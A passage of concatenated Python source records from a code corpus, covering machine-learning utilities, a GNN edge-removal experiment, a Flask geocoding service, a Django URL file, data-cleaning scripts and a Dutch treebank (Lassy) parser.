training data\n counter = Counter()\n\n with open(json_train_filename, \"r\") as f:\n questions = json.load(f)['questions']\n for q in tqdm(questions):\n question_tokens = nltk.tokenize.word_tokenize(q['question'])\n answer = q['answer']\n #pdb.set_trace()\n counter.update(question_tokens)\n '''\n for word in question:\n if word not in quest_to_ix:\n quest_to_ix[word] = len(quest_to_ix)+1 #one based indexing; zero is reserved for padding\n '''\n threshold = 4\n words = [word for word, cnt in counter.items() if cnt >= threshold and word not in quest_to_ix]\n\n i = max(quest_to_ix.values())+1\n\n for w in words:\n quest_to_ix[w] = i\n i += 1\n\n ret = (quest_to_ix, answ_to_ix, answ_ix_to_class) \n with open(cached_dictionaries, 'wb') as f:\n pickle.dump(ret, f)\n\n return ret\n\n\ndef to_dictionary_indexes(dictionary, sentence):\n \"\"\"\n Outputs indexes of the dictionary corresponding to the words in the sequence.\n Case insensitive.\n \"\"\"\n split = nltk.tokenize.word_tokenize(sentence)\n idxs = torch.LongTensor([dictionary[w] if w in dictionary else 0 for w in split])\n return idxs\n\ndef collate_data(batch):\n images, lengths = [], []\n batch_size = len(batch)\n\n max_len = max(map(lambda x: len(x[1]), batch))\n\n questions = np.zeros((batch_size, max_len), dtype=np.int64)\n sort_by_len = sorted(batch, key=lambda x: len(x[1]), reverse=True)\n\n for i, b in enumerate(sort_by_len):\n image, question, length = b\n images.append(torch.from_numpy(image))\n length = len(question)\n questions[i, :length] = question\n lengths.append(length)\n\n return torch.stack(images), torch.from_numpy(questions), \\\n lengths\n\ndef set_optimizer_lr(optimizer, lr):\n # callback to set the learning rate in an optimizer, without rebuilding the whole optimizer\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n return optimizer\n \ndef get_sgdr_lr(period, epoch_id, eta_min, eta_max):\n '''\n Tmax: period\n Tcurr: batch_idx\n '''\n\n radians = math.pi*(epoch_id/period)\n return eta_min + 0.5 * (eta_min + eta_max) * (1.0 + math.cos(radians))\n\ndef get_positional_encoding(H, W):\n pe_dim = 128\n assert pe_dim % 4 == 0, 'pe_dim must be a multiply of 4 (h/w x sin/cos)'\n c_period = 10000. ** np.linspace(0., 1., pe_dim // 4)\n h_vec = np.tile(np.arange(0, H).reshape((H, 1, 1)), (1, W, 1)) / c_period\n w_vec = np.tile(np.arange(0, W).reshape((1, W, 1)), (H, 1, 1)) / c_period\n position_encoding = np.concatenate(\n (np.sin(h_vec), np.cos(h_vec), np.sin(w_vec), np.cos(w_vec)), axis=-1)\n position_encoding = np.transpose(position_encoding.reshape((H, W, pe_dim)), (2,0,1)).astype(np.float32)\n return position_encoding","sub_path":"LNMN_14/utils_test_clevr_humans.py","file_name":"utils_test_clevr_humans.py","file_ext":"py","file_size_in_byte":4678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"639835121","text":"from libraries import *\nfrom geo import Geo\nfrom load_functions import *\nfrom eval_functions import *\n\n\ndataset = 'geotext'\npath = \"C:\\\\Users\\\\61484\\\\Graph_Convolutional_Networks\\\\data\\\\geo\"\ndataset = Geo(path, dataset, transform=None)\ndata = dataset[0]\n\nA, X_train, Y_train, X_dev, Y_dev, X_test, Y_test, U_train, U_dev, U_test, classLatMedian, classLonMedian, userLocation, vocab = get_geo_data(dataset.raw_dir, 'dump.pkl')\n\nU = U_train + U_dev + U_test\nlocs = np.array([userLocation[u] for u in U])\n\nclass Net(torch.nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n self.lin1 = Sequential(Linear(dataset.num_features, 300))\n self.conv1 = GCNConv(300, dataset.num_classes)\n #self.conv2 = GCNConv(300, 300)\n #self.lin2 = Sequential(Linear(300, dataset.num_features))\n\n def forward(self, x, edge_index):\n x = F.relu(self.lin1(x))\n x = F.dropout(x, training=self.training)\n x = F.relu(self.conv1(x, edge_index))\n #x = self.conv2(x, edge_index)\n #x = self.lin2(x)\n return F.log_softmax(x, dim=1)\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nmodel = Net().to(device)\ndata = data.to(device)\nx, edge_index = data.x, data.edge_index\n\nmodel_path = osp.join(dataset.raw_dir, 'model.pth')\nprint(f\"model path:{model_path}\")\nif osp.exists(model_path):\n model.load_state_dict(torch.load(model_path))\n model.eval()\n\n#returns the non_zero edges based on the explained priority:\ndef priority_edges(edge_index,user):\n aa = np.where(np.array(edge_index[:, edge_mask.argsort()[:]][0])==user)\n bb = edge_index[:, edge_mask.argsort()[:]][:,aa]\n \n return bb[:,0]\n\n#index of the same element:\n#cat = explained edge_indexes\ndef self_connection_index(cat,aa):\n bb = cat[:, edge_mask.argsort()[:]]\n xx = bb[:,aa[0]]\n vv = np.array(xx)\n for i in range(len(vv[0])):\n if vv[0][i]==vv[1][i]:\n return i\n#deleting self indexes from the indexes to be removed:\ndef delete_self(aa,index):\n aa3 = np.delete(aa,index,1)\n return aa3\n\n#sorting the other connection index, based on the intial indexes(in the future,it would to easier to remove both edges at the same time)\ndef sort2edge(cat,aa3,aa4):\n bb = cat[:, edge_mask.argsort()[:]]\n ee = bb[:,aa3[0]]\n ff = bb[:,aa4[0]]\n ls = []\n for i in ff[0]:\n cnt = 0\n for j in ee[1]:\n if i==j:\n ls.append(cnt)\n cnt +=1\n r = np.arange(len(aa4[0]))\n np.put(r,ls,list(aa4[0]))\n return r\n\n#revering indexes:\ndef revere_indexes(r):\n return r[::-1]\n\ndef find_indx(ls1,ls2):\n ls= []\n for i in ls1:\n cnt=0\n for j in ls2:\n if i==j:\n ls.append(cnt)\n cnt+=1 \n return ls\n\n\nexplainer = GNNExplainer(model, epochs=200)\n\n#random removal of edges:\ntest_index = np.arange(len(U_train + U_dev), len(U_train + U_dev + U_test)).tolist()\nhav_distance = [] #distance between the true and predcited labels for each user\nlatlon_tr = [] #true latitutde and longitude of the users\nlatlon_pre = []# predicted latitude and longitude of the users\naccuracy = []\nnum_us = []\nuser_id = []\nuser_add = 0\n\nrand_edges = np.arange(211451)\n\nfor user in tqdm(test_index[0:100]):\n #explaining the node\n node_feat_mask, edge_mask = explainer.explain_node(user, x, edge_index)\n\n #priotizig the edges based on explaination\n prio_edge = priority_edges(edge_index,user) \n\n aa1 = np.where(np.array(edge_index[:, edge_mask.argsort()[:]][0])==user)\n aa2 = np.where(np.array(edge_index[:, edge_mask.argsort()[:]][1])==user)\n \n for num_users in [perc(prio_edge[0],0),perc(prio_edge[0],0.05),perc(prio_edge[0],0.10),perc(prio_edge[0],0.20),perc(prio_edge[0],0.40),perc(prio_edge[0],0.60),perc(prio_edge[0],0.80),perc(prio_edge[0],1)]:\n #------------------------------------------------------------\n Adj_mat = A.copy()\n Adj_mat.setdiag(1)\n Adj_mat[Adj_mat>0] = 1\n\n Adj_mat = Adj_mat.tocoo()\n \n cat = torch.tensor([Adj_mat.row, Adj_mat.col], dtype=torch.long)\n bb = cat[:, edge_mask.argsort()[:]]\n \n self_indx1,self_indx2 = self_connection_index(cat,aa1),self_connection_index(cat,aa2)\n conn1,conn2 = delete_self(aa1,self_indx1),delete_self(aa2,self_indx2)\n sorted_conn2 = sort2edge(cat,conn1,conn2)\n \n try:\n asd = sample(list(conn1[0]),num_users) #random sampling\n except ValueError:\n asd = sample(list(conn1[0]),num_users-1)\n qwe = find_indx(asd,conn1[0]) \n fgh = sorted_conn2[qwe] #indexes of the edges from the other side of the connection.\n \n edge_index_new = torch.tensor(np.delete(np.array(bb),np.append(asd,list(fgh)),1)) # removing the edges\n\n #using this features to predict the class:\n log_logists_new = model(x,edge_index_new)\n y_pred_test_new = torch.argmax(log_logists_new, dim=1)[np.arange(len(U_train + U_dev), len(U_train + U_dev + U_test))][user_add]\n distances, acc_at_161, latlon_true, latlon_pred = geo_eval_trail(Y_test[user_add], np.array(y_pred_test_new), U_test[user_add], classLatMedian, classLonMedian, userLocation)\n hav_distance.append(distances[0])\n latlon_tr.append(latlon_true[0])\n latlon_pre.append(latlon_pred[0])\n accuracy.append(acc_at_161)\n num_us.append(num_users)\n user_id.append(U_test[user_add])\n user_add += 1\n\ndf1 = pd.DataFrame(list(zip(user_id,num_us,latlon_tr,latlon_pre,hav_distance,accuracy)),columns =['user','num_users','latlon_tru','latlon_pred','haversine_distance',\"acc_at_161\"])\n\n\npercent = [0,5,10,20,40,60,80,100]\ndf1['percent'] = percent *100\n\nmean_pts = [np.mean(df1[df1['percent']==i]['haversine_distance']) for i in percent]\nmedian_pts = [np.median(df1[df1['percent']==i]['haversine_distance']) for i in percent]\n\nacc_pts = []\nfor i in percent:\n dist = list(df1[df1['percent']==i]['haversine_distance'])\n accuracy= len([d for d in dist if d < 161]) / float(len(dist))\n acc_pts.append(accuracy)\n\n\ndf1.to_csv('C:\\\\Users\\\\61484\\\\Graph_Convolutional_Networks\\\\saved_files\\\\remove_edges_random.csv',index=False)\n\nwith open(\"C:\\\\Users\\\\61484\\\\Graph_Convolutional_Networks\\\\saved_files\\\\mean_pts_edges_rm_random.txt\", \"wb\") as fp: \n pickle.dump(mean_pts, fp)\n\nwith open(\"C:\\\\Users\\\\61484\\\\Graph_Convolutional_Networks\\\\saved_files\\\\median_pts_edges_rm_random.txt\", \"wb\") as fp: \n pickle.dump(median_pts, fp)\n\nwith open(\"C:\\\\Users\\\\61484\\\\Graph_Convolutional_Networks\\\\saved_files\\\\acc_pts_edges_rm_random.txt\", \"wb\") as fp: \n pickle.dump(acc_pts, fp)","sub_path":"remove_edges_random.py","file_name":"remove_edges_random.py","file_ext":"py","file_size_in_byte":6634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"198685916","text":"from django.conf.urls import url, include\nfrom django.contrib import admin\nfrom django.conf import settings\n\nurlpatterns = []\n\nif settings.DJANGO_ADMIN_ENABLED:\n urlpatterns += [\n url(r'^admin/', admin.site.urls),\n ]\n\nurlpatterns += [\n url(r'', include('mf_game.urls')),\n]\n","sub_path":"mathfun/mathfun/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"141942594","text":"#!/bin/bash\n\n# Graph the cost of theta 1 and determine the best fit line\n\nplot = ((1,1),(2,2),(3,3))\n\nn = len(plot)\n\ndef h(x, theta1):\n return theta1*x\n\ndef J(theta1):\n sum = 0.0\n for i in range(n):\n sum+= (h(plot[i][0],theta1) - plot[i][1]) ** 2\n return (1.0/(2*n)) * sum\ncost = 1\n\nfor i in range(plot[len(plot)-1][0]):\n print(str(i) + \": \" + str(J(i)))\n","sub_path":"Ex1.py","file_name":"Ex1.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"461622479","text":"##########################################################################\n#\n# Courtesy of Felix Dangel: https://github.com/f-dangel/backpack\n#\n##########################################################################\n\n\n\"\"\"Exact computation of full Hessian using autodiff.\"\"\"\nfrom torch import cat, zeros, stack\nfrom torch.autograd import grad\nfrom tqdm import tqdm, trange\n\n\ndef exact_hessian(f, parameters, show_progress=False):\n r\"\"\"Compute all second derivatives of a scalar w.r.t. `parameters`.\n​\n The order of parameters corresponds to a one-dimensional\n vectorization followed by a concatenation of all tensors in\n `parameters`.\n​\n Parameters\n ----------\n f : scalar torch.Tensor\n Scalar PyTorch function/tensor.\n parameters : list or tuple or iterator of torch.Tensor\n Iterable object containing all tensors acting as variables of `f`.\n show_progress : bool\n Show a progressbar while performing the computation.\n​\n Returns\n -------\n torch.Tensor\n Hessian of `f` with respect to the concatenated version\n of all flattened quantities in `parameters`\n\n Note\n ----\n The parameters in the list are all flattened and concatenated\n into one large vector `theta`. Return the matrix :math:`d^2 E /\n d \\theta^2` with\n\n .. math::\n​\n (d^2E / d \\theta^2)[i, j] = (d^2E / d \\theta[i] d \\theta[j]).\n​\n The code is a modified version of\n https://discuss.pytorch.org/t/compute-the-hessian-matrix-of-a-\n network/15270/3\n \"\"\"\n params = list(parameters)\n if not all(p.requires_grad for p in params):\n raise ValueError(\"All parameters have to require_grad\")\n df = grad(f, params, create_graph=True)\n # flatten all parameter gradients and concatenate into a vector\n dtheta = None\n for grad_f in df:\n dtheta = (\n grad_f.contiguous().view(-1)\n if dtheta is None\n else cat([dtheta, grad_f.contiguous().view(-1)])\n )\n # compute second derivatives\n hessian_dim = dtheta.size(0)\n hessian = zeros(hessian_dim, hessian_dim)\n progressbar = tqdm(\n iterable=range(hessian_dim),\n total=hessian_dim,\n desc=\"[exact] Full Hessian\",\n disable=(not show_progress),\n )\n for idx in progressbar:\n df2 = grad(dtheta[idx], params, create_graph=True)\n d2theta = None\n for d2 in df2:\n d2theta = (\n d2.contiguous().view(-1)\n if d2theta is None\n else cat([d2theta, d2.contiguous().view(-1)])\n )\n hessian[idx] = d2theta\n return hessian\n\n\ndef exact_hessian_diagonal_blocks(f, parameters, show_progress=True):\n \"\"\"Compute diagonal blocks of a scalar function's Hessian.\n​\n Parameters\n ----------\n f : scalar of torch.Tensor\n Scalar PyTorch function\n parameters : list or tuple or iterator of torch.Tensor\n List of parameters whose second derivatives are to be computed\n in a blockwise manner\n show_progress : bool, optional\n Show a progressbar while performing the computation.\n​\n Returns\n -------\n list of torch.Tensor\n Hessian blocks. The order is identical to the order specified\n by `parameters`\n​\n Note\n ----\n For each parameter, `exact_hessian` is called.\n \"\"\"\n return [exact_hessian(f, [p], show_progress=show_progress)\n for p in parameters]\n","sub_path":"hessian.py","file_name":"hessian.py","file_ext":"py","file_size_in_byte":3376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"547223560","text":"class Solution:\n def findJudge(self, N, trusts):\n tracker = [N] * N\n for trust in trusts:\n a, b = trust\n tracker[a - 1] = -1\n if tracker[b - 1] != -1:\n tracker[b - 1] -= 1\n print(tracker)\n judges = [i for i, item in enumerate(tracker) if item == 1]\n return judges[0] + 1 if len(judges) == 1 else -1\n\n\ns = Solution()\nN = 4\ntrusts = [[1, 3], [1, 4], [2, 3], [2, 4], [4, 3]]\nprint(s.findJudge(N, trusts))\n","sub_path":"Python_Projects/6-Google codejam/171_find_the_town_judge.py","file_name":"171_find_the_town_judge.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"552350814","text":"\nimport csv\nimport numpy as np\nimport pandas as pd\nimport datetime as dt\n\nwith open('Sykt_t_data_2019.csv', encoding='cp1251') as csvfile:\n spamreader = csv.reader(csvfile)\n fields_name = spamreader.__next__()[1:]\n\nfields = [*fields_name[1:5],*fields_name[10:11],*fields_name[28:30],*fields_name[31:33],*fields_name[34:35],*fields_name[37:39],*fields_name[41:42],*fields_name[43:44]]\nprint(repr(fields))\n\ndb = pd.read_csv('Sykt_t_data_2019.csv', encoding='cp1251')\ndb = db[fields]\nprint(db.loc[0])\ndb['date'] = db.apply(lambda row: str(int(row[fields[0]])) + ':' + str(int(row[fields[1]]))+ ':' + str(int(row[fields[2]])) + ':' + str(int(row[fields[3]])) + \":00:00\", axis=1) #+'-'+db[fields_name[6]].str\ndb['date'] = pd.to_datetime(db['date'], format='%Y:%m:%d:%H:%M:%S')\n#db['date'] = db['date'] + dt.timedelta(hours=3)\ndb['date'] = db['date'] + dt.timedelta(hours=3)\n\ndb = db.set_index(pd.DatetimeIndex(db['date']))\ndb = db[['Сумма осадков', 'Температура поверхности почвы', 'Мин. температура пов-сти почвы между сроками', 'Макс. температура пов-сти почвы между сроками', 'Температура воздуха по сухому терм-ру', 'Мин.температура воздуха между сроками', 'Макс. темперура воздуха между сроками', 'Относительная влажность воздуха']]\n# print(db.loc['2018-09-02 15:00:00']['Температура воздуха по сухому терм-ру'])\n# print(db.loc['2018-09-02 18:00:00']['Температура воздуха по сухому терм-ру'])\n# print(db.loc['2018-09-02 21:00:00']['Температура воздуха по сухому терм-ру'])\ndb.to_csv('Sykt_t_data_cleaned_2019.csv', encoding='cp1251')\n\n","sub_path":"t_data_cleaning2019.py","file_name":"t_data_cleaning2019.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"340802349","text":"# standard imports\nfrom typing import Iterator\nfrom argparse import ArgumentParser, Namespace\n\n# toolbox imports\nfrom .config import config\n\n\ndef prepare(parser: ArgumentParser) -> None:\n \"\"\"Add arguments to an :py:class:`ArgumentParser`, that\n allow to specify general options for the Deep Learning ToolBox.\n\n Parameters\n ----------\n parser: ArgumentParser\n The argument parser to which arguments are to be added.\n \"\"\"\n parser.add_argument('--warn-missing-dependencies',\n help=\"Issue warnings on missing software packages\",\n action='store_true', default=False)\n\ndef evalute(args: Namespace) -> None:\n \"\"\"Evaluate command line arguments for configuring the toolbox.\n\n Parameters\n ----------\n args: Namespace\n An `Namespace` from parsing the command line\n arguments with `parser.parse_args()`.\n \"\"\"\n\n if args.warn_missing_dependencies:\n config.warn_missing_dependencies = True\n","sub_path":"dltb/argparse.py","file_name":"argparse.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"55159912","text":"import os\nimport json\nfrom flask import Flask, request, make_response, jsonify\nfrom requests import get, status_codes\n\napp = Flask(__name__)\n\n\nKEY = os.environ['MAPS_KEY']\nBASE_URL = 'https://maps.googleapis.com/maps/api'\n\n@app.route('/coords', methods=['GET'])\ndef get_coordinates():\n zip_code_param = 'zip_code'\n try: \n zip_code = request.args.get(zip_code_param)\n coords = get(\n f'{BASE_URL}/geocode/json?address={zip_code}&key={KEY}').json()['results'][0]['geometry']['location']\n \n lat, lng = float(coords['lat']), float(coords['lng'])\n return jsonify({\"latitude\": lat, \"longitude\" : lng})\n except:\n return make_response('zip_code is a required query parameter', 400)\n\n\n@app.route('/coords/validate', methods=['GET'])\ndef validate_coords():\n latitude_param, longitude_param = 'latitude', 'longitude'\n try:\n latitude, longitude = float(request.args.get(latitude_param)), float(request.args.get(longitude_param))\n except:\n return make_response('Must provide the \"{:s}\" and \"{:s}\" query params as float values\\n'.format(latitude_param, longitude_param), 400) \n res = get(\n f'{BASE_URL}/timezone/json?location={latitude},{longitude}×tamp=1458000000&key={KEY}')\n if (res.status_code == 200): return make_response('Valid coordinates', 200)\n else: return make_response('Invalid coordinates', 400)\n\napp.run(debug=True, host='0.0.0.0', port=int(os.environ['PORT']))\n","sub_path":"maps-service/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"51746349","text":"from os import path\n\ndef isRoundingDifference(a,b):\n foundDiff = False\n for i in range(len(a)):\n if a[i] == b[i] and not foundDiff:\n continue\n foundDiff = True\n if foundDiff and a[i] == b[i]:\n return False\n \n return True\n\n\nscriptPath = path.abspath(__file__)\nscriptDirPath = path.split(scriptPath)[0]\nconfigPath = path.split(scriptDirPath)[0]\n\nsourceFile = open(f'{configPath}/InputFiles/fpValues.txt', 'r')\nresultsFile = open(f'{configPath}/OutputFiles/subResults.txt', 'r')\nanswerKey = open(f'{configPath}/OutputFiles/subAnswerKey.txt', 'r')\ntestResults = open(f'{configPath}/OutputFiles/fpSubResults.txt', 'w')\n\nresults = resultsFile.readlines()\nanswers = answerKey.readlines()\n\nsuccessCount = 0\nfailCount = 0\nfor i in range(1,len(results)+1):\n a = sourceFile.readline()\n b = sourceFile.readline()\n\n result = results[i-1][0:32]\n answer = answers[i-1][0:32]\n\n if result != answer:\n if isRoundingDifference(answer, result):\n print(f'{i}: Rounding error', file=testResults)\n successCount += 1\n else:\n if failCount < 25:\n print(\"Case\", i)\n print(a[0:32], \" +\\n\", b[0:32], ' =', sep = '')\n print(f'{answer} but got\\n{result}')\n print(f'{i}: Fail',file=testResults)\n failCount += 1\n \n #print('Failed on test', i+1)\n else:\n print(f'{i}: Success',file=testResults)\n successCount += 1\n #print('Success on test', i+1)\n\nprint(f'Success: {successCount}')\nprint(f'Fail: {failCount}')\n\nsourceFile.close()\nresultsFile.close()\nanswerKey.close()\ntestResults.close()","sub_path":"OldSim/Simulation.configuration/scripts/fpSubTest.py","file_name":"fpSubTest.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"188007852","text":"import os\nimport xml.etree.cElementTree as ET\nfrom glob import glob\nfrom copy import deepcopy\nimport graphviz\nfrom pprint import pprint as print\n\nfrom torch.utils.data import Dataset, DataLoader\nfrom torchvision.transforms import Compose\n\nfrom itertools import groupby, chain\nfrom collections import Counter\n\nfrom WordType import *\n\nfrom warnings import warn\n\n\nclass Lassy(Dataset):\n \"\"\"\n Lassy dataset\n \"\"\"\n\n def __init__(self, root_dir='/home/kokos/Documents/Projects/LassySmall 4.0', treebank_dir='/Treebank',\n transform=None, ignore=True):\n \"\"\"\n\n :param root_dir:\n :param treebank_dir:\n :param transform:\n \"\"\"\n\n if os.path.isdir(root_dir) and os.path.isdir(root_dir+treebank_dir):\n self.root_dir = root_dir # might be useful to store meta information\n self.treebank_dir = root_dir + treebank_dir\n else:\n raise ValueError('%s and %s must be existing directories' % (root_dir, treebank_dir))\n\n ignored = []\n if ignore:\n try:\n with open('ignored.txt', 'r') as f:\n ignored = f.readlines()\n ignored = list(map(lambda x: x[0:-1], ignored))\n except FileNotFoundError:\n pass\n print('Ignoring {} samples..'.format(len(ignored)))\n\n self.filelist = [y for x in os.walk(self.treebank_dir) for y in glob(os.path.join(x[0], '*.[xX][mM][lL]'))\n if y not in ignored]\n self.transform = transform\n\n print('Dataset constructed with {} samples.'.format(len(self.filelist)))\n\n def __len__(self):\n \"\"\"\n :return:\n \"\"\"\n return len(self.filelist)\n\n def __getitem__(self, id):\n \"\"\"\n :param file:\n :return: id (INT), FILENAME (STR), PARSE (XMLTREE)\n \"\"\"\n\n if type(id) == int:\n file = self.filelist[id]\n elif type(id) == str:\n file = id\n else:\n raise TypeError('file argument has to be int or str')\n\n parse = ET.parse(file)\n parse.getroot().set('type', 'Tree')\n\n sample = (id, file, parse)\n\n if self.transform:\n return self.transform(sample)\n\n return sample\n\n @staticmethod\n def extract_nodes(xtree):\n \"\"\"\n A simple iterator over an xml parse that returns the parse tree's nodes. This is necessary as the default ET\n iterator does not provide parent or depth info.\n :param xtree:\n :return (child_node, parent_node, depth)\n \"\"\"\n\n root = xtree.getroot().find('node')\n parents = [root]\n\n yield (root, None)\n while parents:\n children = []\n for parent in parents:\n for child in parent.findall('node'):\n children.append(child)\n yield (child, parent)\n parents = children\n\n\n @staticmethod\n def find_main_coindex(xtree):\n \"\"\"\n Takes an ElementTree representing a parse tree, finds out nodes corresponding to the same lexical unit, and\n selects a single node to act as the \"main\" node (the one to collapse dependencies to, when removing its\n cross-references).\n :param cElementTree xtree: the ElementTree to operate on\n :return dict all_coind a dictionary mapping each co-indexing identifier to a list of nodes sharing it,\n dict main_coind a dictionary mapping each co-indexing identifier to the main node of the group:\n\n \"\"\"\n coindexed = list(filter(lambda x: 'index' in x.attrib.keys(), xtree.iter('node')))\n if not coindexed:\n return dict(), dict()\n all_coind = {i: [node for node in group] for i, group in\n groupby(sorted(coindexed, key=lambda x: x.attrib['index']), key=lambda x: x.attrib['index'])}\n # find the 'main' child for each set of siblings\n main_coind = {i: list(filter(lambda x: 'cat' in x.attrib or 'word' in x.attrib, nodes))[0]\n for i, nodes in all_coind.items()}\n return all_coind, main_coind\n\n @staticmethod\n def tree_to_dag(xtree, inline=False):\n \"\"\"\n Takes an ElementTree representing a parse tree, possibly containing duplicate nodes (that is, nodes that\n correspond to the same lexical unit but with a different identifier to preserve the tree format). Removes\n duplicate nodes by constructing new dependency links between cross-references (moving to a DAG format), and\n returns the resulting ElementTree.\n :param xtree: the ElementTree to process\n :param inline: whether to apply the changes to the original tree or a copy of it\n :return xtree: the modified ElementTree\n \"\"\"\n if not inline:\n xtree = deepcopy(xtree)\n\n nodes = list(Lassy.extract_nodes(xtree))\n\n _, main_coind = Lassy.find_main_coindex(xtree)\n\n for node, parent in nodes[1:]:\n if node in main_coind.values():\n node.attrib['rel'] = {parent.attrib['id']: [node.attrib['rel'], 'primary']}\n\n for node, parent in nodes[1:]:\n if type(node.attrib['rel']) == str:\n if 'index' in node.attrib.keys():\n\n main_coind[node.attrib['index']].attrib['rel'] = {parent.attrib['id']: [node.attrib['rel'],\n 'secondary'],\n **main_coind[node.attrib['index']].attrib['rel']}\n parent.remove(node)\n else:\n node.attrib['rel'] = {parent.attrib['id']: node.attrib['rel']}\n return xtree\n\n\nclass Decompose:\n def __init__(self, type_dict=None, unify=False, return_lists=True, text_pipeline=lambda x: x.lower(),\n separation_symbol='↔', visualize=False):\n # type_dict: POS → Type\n if not type_dict:\n # todo: instantiate the type dict with Types and refactor all downwards call to allow for complex types\n self.type_dict = {'adj': 'ADJ', 'adv': 'ADV', 'advp': 'ADV', 'ahi': 'AHI', 'ap': 'AP', 'comp': 'COMP',\n 'comparative': 'COMPARATIVE', 'conj': 'CONJ', 'cp': 'CP', 'det': 'DET', 'detp': 'DET',\n 'du': 'DU', 'fixed': 'FIXED', 'inf': 'INF', 'mwu': 'MWU', 'name': 'NP', 'noun': 'NP',\n 'np': 'NP', 'num': 'NP', 'oti': 'OTI', 'part': 'PART', 'pp': 'PP', 'ppart': 'PPART',\n 'ppres': 'PPRES', 'prefix': 'PREFIX', 'prep': 'PREP', 'pron': 'NP', 'punct': 'PUNCT',\n 'rel': 'REL', 'smain': 'S', 'ssub': 'S', 'sv1': 'S', 'svan': 'SVAN',\n 'tag': 'TAG', 'ti': 'TI', 'top': 'TOP', 'verb': 'VERB', 'vg': 'VG', 'whq': 'WHQ',\n 'whrel': 'WHREL', 'whsub': 'WHSUB'}\n # convert to Types\n self.type_dict = {k: AtomicType(v) for k, v in self.type_dict.items()}\n\n # Type conventions (richard)\n # # todo: need to change the direction of headedness before applying\n # self.type_dict['det'] = WordType([('NP', 'det')], 'NP')\n # self.type_dict['adj'] = WordType([('NP', 'mod')], 'NP')\n # self.type_dict['ap'] = WordType([('NP', 'mod')], 'NP')\n # self.type_dict['adv'] = WordType([('S', 'mod')], 'S')\n # self.type_dict['advp'] = WordType([('S', 'mod')], 'S')\n self.unify = unify # whether to return a single lexicon from a sentence, or a lexicon for each subunit\n self.return_lists = return_lists # whether to convert lexicons to word and type sequences\n self.text_pipeline = text_pipeline # the function applied on the text before adding a word to the lexicon\n self.separation_symbol = separation_symbol # the separation symbol between a node's text content and its id\n # the function applied to convert the processed text of a node into a dictionary key\n self.get_key = lambda node: self.text_pipeline(node.attrib['word']) + self.separation_symbol + node.attrib['id']\n self.head_candidates = ('hd', 'rhd', 'whd', 'cmp', 'crd', 'dlink')\n self.visualize = visualize\n\n @staticmethod\n def is_leaf(node):\n \"\"\"\n Returns True if a node is a leaf in the parse tree, False otherwise.\n :param node: the node to decide\n :return True | False:\n \"\"\"\n return True if 'word' in node.attrib.keys() else False\n\n def majority_vote(self, node, grouped):\n \"\"\"\n Returns the majority voting of a node's children base types.\n :param node:\n :param grouped:\n :return:\n \"\"\"\n sibling_types = [self.get_type_key(n[0], grouped) for n in grouped[node]]\n votes = {c: len([x for x in sibling_types if x == c]) for c in set(sibling_types)}\n votes = sorted(votes, key=lambda x: -votes[x])\n return votes[0]\n\n def get_type_key(self, node, grouped):\n \"\"\"\n This will return the pos/cat of a node, performing majority vote on conjunctions\n :param node:\n :param grouped:\n :return:\n \"\"\"\n if 'cat' in node.attrib.keys():\n if node.attrib['cat'] == 'conj':\n return self.majority_vote(node, grouped)\n return node.attrib['cat']\n return node.attrib['pos']\n\n def get_plain_type(self, node, grouped, rel=None):\n \"\"\"\n This will return the plain (i.e. ignoring context) of a node, based on the type_dict of the class\n :param node:\n :param grouped:\n :return:\n \"\"\"\n if rel is not None and self.get_rel(rel) == 'mod':\n return AtomicType('MOD')\n if 'cat' in node.attrib.keys():\n if node.attrib['cat'] == 'conj':\n return self.type_dict[self.majority_vote(node, grouped)]\n return self.type_dict[node.attrib['cat']]\n return self.type_dict[node.attrib['pos']]\n\n @staticmethod\n def group_by_parent(xtree):\n \"\"\"\n Converts the representation from ETree to a dictionary mapping parents to their children\n :param ElementTree xtree:\n :return dict grouped: a dictionary mapping each node to its children\n \"\"\"\n nodes = list(xtree.iter('node'))\n grouped = []\n for node in nodes:\n if type(node.attrib['rel']) == str:\n grouped.append([node, -1, 'top'])\n else:\n for parent, rel in node.attrib['rel'].items():\n grouped.append([node, parent, rel])\n grouped = sorted(grouped, key=lambda x: int(x[1]))\n grouped = groupby(grouped, key=lambda x: int(x[1]))\n grouped = {k: [[v[0], v[2]] for v in V] for k, V in grouped}\n grouped = dict(map(lambda x: [x[0], x[1]], grouped.items()))\n\n newdict = dict()\n\n for key in grouped.keys():\n if key == -1:\n newdict[None] = grouped[key]\n continue\n newkey = list(filter(lambda x: x.attrib['id'] == str(key), nodes))[0]\n newdict[newkey] = grouped[key]\n return newdict\n\n @staticmethod\n def split_dag(grouped, cats_to_remove=('du',), rels_to_remove=('dp', 'sat', 'nucl', 'tag', '--', 'top')):\n \"\"\"\n Takes a dictionary possibly containing headless structures, and returns multiple dictionaries that don't.\n Essentially splits a parse DAG into a set of disjoint DAGs.\n :param grouped:\n :param cats_to_remove:\n :param rels_to_remove:\n :return:\n \"\"\"\n keys_to_remove = list()\n\n for key in grouped.keys():\n if key is not None:\n if 'cat' in key.attrib.keys():\n if key.attrib['cat'] in cats_to_remove:\n keys_to_remove.append(key)\n\n for key in keys_to_remove:\n del grouped[key] # here we delete the node from being a parent (outgoing edges)\n\n # here we remove children\n for key in 